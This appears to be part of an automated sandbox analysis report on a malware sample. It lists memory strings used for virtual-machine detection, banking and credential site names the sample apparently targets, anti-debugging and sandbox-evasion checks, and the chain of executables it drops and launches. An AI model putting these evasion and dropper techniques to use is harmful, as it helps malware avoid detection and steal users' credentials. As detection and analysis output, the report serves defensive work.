Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2450878675.0000000001AE5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450878675.0000000001B3D000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3241803333.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000D.00000002.3241803333.0000000000E98000.00000004.00000020.00020000.00000000.sdmp, 0244247334.exe, 0000000E.00000002.3055852446.0000000001949000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: GHCGDAFC.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 0244247334.exe, 0000000E.00000002.3055852446.00000000018F5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: GHCGDAFC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: GHCGDAFC.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: GHCGDAFC.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: GHCGDAFC.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: file.exe, file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: file.exe, 00000000.00000002.2449562218.00000000009EC000.00000040.00000001.01000000.00000003.sdmp, 0244247334.exe, 0000000E.00000002.3054902462.000000000095C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Thread information set: HideFromDebugger Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Checks for debuggers (devices)
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: SIWVID
Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Code function: 7_2_04BF0CB7 rdtsc 7_2_04BF0CB7
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose, 0_2_6C5B5FF0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5BC410
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0067643B mov eax, dword ptr fs:[00000030h] 13_2_0067643B
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0067A1A2 mov eax, dword ptr fs:[00000030h] 13_2_0067A1A2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_6C58B66C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_6C58B1F7
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\DAFHIDGIJK.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe "C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe "C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe "C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
